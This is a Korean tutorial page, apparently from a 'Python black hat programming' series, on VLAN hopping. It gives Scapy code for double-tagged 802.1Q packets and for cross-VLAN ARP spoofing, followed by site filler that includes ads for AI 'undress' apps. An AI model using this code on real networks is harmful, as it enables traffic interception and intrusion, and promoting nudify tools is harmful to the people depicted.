VLAN(Virtual Local Area Network)은 이더넷 상호 작용 기술을 기반으로 구축된 가상 네트워크로, 동일한 물리적 네트워크를 여러 VALN으로 나눌 수 있을 뿐만 아니라 물리적 네트워크 장벽을 넘어 서로 다른 서브넷의 사용자를 동일한 네트워크로 나눌 수 있습니다. VLAN. 그림 2는 VLAN 분할의 예이다.
그림 2
VLAN을 구현하는 방법에는 일반적으로 스위칭 장비에 따라 두 가지 유형이 있습니다.
l 스위치 기반 포트 분할
l IEEE 802.1q 프로토콜 기반, 확장 이더넷 프레임 형식
Layer 2 기반 VLAN 기술에는 여러 스위치에 걸쳐 설정된 동일한 VLAN의 구성원이 서로 통신할 수 있도록 서로 다른 스위치를 연결하는 데 사용되는 트렁킹이라는 개념이 있습니다. 스위치 간의 상호 연결에 사용되는 포트를 트렁크 포트라고 합니다. 80.2.1q 외에도 Cisco에는 ISL이라는 자체 트렁크 프로토콜이 있습니다.
그림 3
그림 3은 802.1q 데이터 패킷으로 일반 이더넷 프레임과 본질적으로 다르지 않습니다. VLAN 태그를 추가합니다. 빨간색 부분의 VLAN 식별자는 데이터 패킷이 어느 VLAN에 속해 있는지 식별하여 데이터 브로드캐스트 범위가 VLAN을 넘지 않도록 합니다.
이제 간단히 생각해 보겠습니다. VLAN을 통해 통신하려면 데이터 패킷의 식별자만 수정하면 되나요?
3.4.1 VLAN Hopping
위의 분석을 바탕으로 간단한 시나리오인 cross-VLAN을 고려합니다. ping, Vlan1의 호스트에서 Vlan2의 호스트로 ping 요청을 보냅니다.
특정 인코딩 전에 VLAN 패킷 구성 문제를 해결해야 합니다. Scapy에서는 Dot1Q 클래스를 사용하여 그림 3의 태그 부분을 구성합니다. 그림 4와 같습니다.
그림 4
이제 교차 VLAN 핑 요청을 작성할 수 있습니다.
#!/usr/bin/python from scapy.all import * packet = Ether(dst="c0:d3:de:ad:be:ef") / \ Dot1Q(vlan=1) / \ Dot1Q(vlan=2) / \ IP(dst="192.168.13.3") / \ ICMP() sendp(packet)
위 코드에서는 대상 호스트의 MAC 및 IP 주소를 지정하고 두 개의 VLAN 식별자를 추가합니다. 첫 번째는 전송용입니다. data 호스트가 위치한 VLAN이고, 두 번째는 대상 호스트가 위치한 VLAN입니다. 스위치는 첫 번째 식별자를 제거하고 두 번째 식별자를 읽으면 패킷을 대상 호스트로 전달합니다.
3.4.2 교차 VLAN ARP 스푸핑
섹션 3.1, 3.2 및 3.3 우리 모두는 ARP 스푸핑 문제에 대해 논의하고 있습니다. VLAN은 브로드캐스트 도메인을 제한하므로 이전 코드는 VLAN 전체에서 ARP 스푸핑을 수행할 수 없습니다. 하지만 이 문제를 해결하는 방법은 매우 간단합니다. 앞서 구성한 ARP 스푸핑 데이터에 VLAN 식별자만 삽입하면 됩니다. 다음 코드는 섹션 3.1에서 ARP 요청 패킷을 구성하는 데 사용한 코드입니다.
def build_req(): if options.target is None: pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0]) elif options.target: target_mac = getmacbyip(options.target) if target_mac is None: print "[-] Error: Could not resolve targets MAC address" sys.exit(1) pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target) return pkt
데이터 패킷 구성 부분에서 VLAN 식별자를 삽입합니다:
pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
이러한 방식으로 VLAN 간 ARP 스푸핑이 가능합니다.
3.4.3 요약
이 섹션에서는 주로 VLAN을 스푸핑하여 교차 통신을 달성하는 데이터 패킷을 구성하는 방법에 대해 설명합니다. -VLAN 데이터 통신 및 ARP 스푸핑 목적. 이 문서의 방법은 주로 802.1Q 프로토콜에 대한 것이며 포트에 의해 물리적으로 격리된 VLAN에는 영향을 미치지 않습니다.
위는 편집자가 소개한 VLAN 전반에 걸친 Python 블랙햇 프로그래밍 3.4에 대한 자세한 설명입니다. 궁금한 점이 있으면 메시지를 남겨주세요. 편집자는 제 시간에 응답할 것입니다. 또한 PHP 중국어 웹사이트를 지원해 주신 모든 분들께 감사드립니다!
더 많은 Python black hat 프로그래밍 3.4 VLAN 간 관련 기사를 보려면 PHP 중국어 웹사이트를 주목하세요!

Python은 게임 및 GUI 개발에서 탁월합니다. 1) 게임 개발은 Pygame을 사용하여 드로잉, 오디오 및 기타 기능을 제공하며 2D 게임을 만드는 데 적합합니다. 2) GUI 개발은 Tkinter 또는 PYQT를 선택할 수 있습니다. Tkinter는 간단하고 사용하기 쉽고 PYQT는 풍부한 기능을 가지고 있으며 전문 개발에 적합합니다.

Python은 데이터 과학, 웹 개발 및 자동화 작업에 적합한 반면 C는 시스템 프로그래밍, 게임 개발 및 임베디드 시스템에 적합합니다. Python은 단순성과 강력한 생태계로 유명하며 C는 고성능 및 기본 제어 기능으로 유명합니다.

2 시간 이내에 Python의 기본 프로그래밍 개념과 기술을 배울 수 있습니다. 1. 변수 및 데이터 유형을 배우기, 2. 마스터 제어 흐름 (조건부 명세서 및 루프), 3. 기능의 정의 및 사용을 이해하십시오. 4. 간단한 예제 및 코드 스 니펫을 통해 Python 프로그래밍을 신속하게 시작하십시오.

Python은 웹 개발, 데이터 과학, 기계 학습, 자동화 및 스크립팅 분야에서 널리 사용됩니다. 1) 웹 개발에서 Django 및 Flask 프레임 워크는 개발 프로세스를 단순화합니다. 2) 데이터 과학 및 기계 학습 분야에서 Numpy, Pandas, Scikit-Learn 및 Tensorflow 라이브러리는 강력한 지원을 제공합니다. 3) 자동화 및 스크립팅 측면에서 Python은 자동화 된 테스트 및 시스템 관리와 같은 작업에 적합합니다.

2 시간 이내에 파이썬의 기본 사항을 배울 수 있습니다. 1. 변수 및 데이터 유형을 배우십시오. 이를 통해 간단한 파이썬 프로그램 작성을 시작하는 데 도움이됩니다.

10 시간 이내에 컴퓨터 초보자 프로그래밍 기본 사항을 가르치는 방법은 무엇입니까? 컴퓨터 초보자에게 프로그래밍 지식을 가르치는 데 10 시간 밖에 걸리지 않는다면 무엇을 가르치기로 선택 하시겠습니까?

Fiddlerevery Where를 사용할 때 Man-in-the-Middle Reading에 Fiddlereverywhere를 사용할 때 감지되는 방법 ...

Python 3.6에 피클 파일로드 3.6 환경 보고서 오류 : modulenotfounderror : nomodulename ...


핫 AI 도구

Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool
무료로 이미지를 벗다

Clothoff.io
AI 옷 제거제

AI Hentai Generator
AI Hentai를 무료로 생성하십시오.

인기 기사

뜨거운 도구

Atom Editor Mac 버전 다운로드
가장 인기 있는 오픈 소스 편집기

Eclipse용 SAP NetWeaver 서버 어댑터
Eclipse를 SAP NetWeaver 애플리케이션 서버와 통합합니다.

PhpStorm 맥 버전
최신(2018.2.1) 전문 PHP 통합 개발 도구

드림위버 CS6
시각적 웹 개발 도구

mPDF
mPDF는 UTF-8로 인코딩된 HTML에서 PDF 파일을 생성할 수 있는 PHP 라이브러리입니다. 원저자인 Ian Back은 자신의 웹 사이트에서 "즉시" PDF 파일을 출력하고 다양한 언어를 처리하기 위해 mPDF를 작성했습니다. HTML2FPDF와 같은 원본 스크립트보다 유니코드 글꼴을 사용할 때 속도가 느리고 더 큰 파일을 생성하지만 CSS 스타일 등을 지원하고 많은 개선 사항이 있습니다. RTL(아랍어, 히브리어), CJK(중국어, 일본어, 한국어)를 포함한 거의 모든 언어를 지원합니다. 중첩된 블록 수준 요소(예: P, DIV)를 지원합니다.
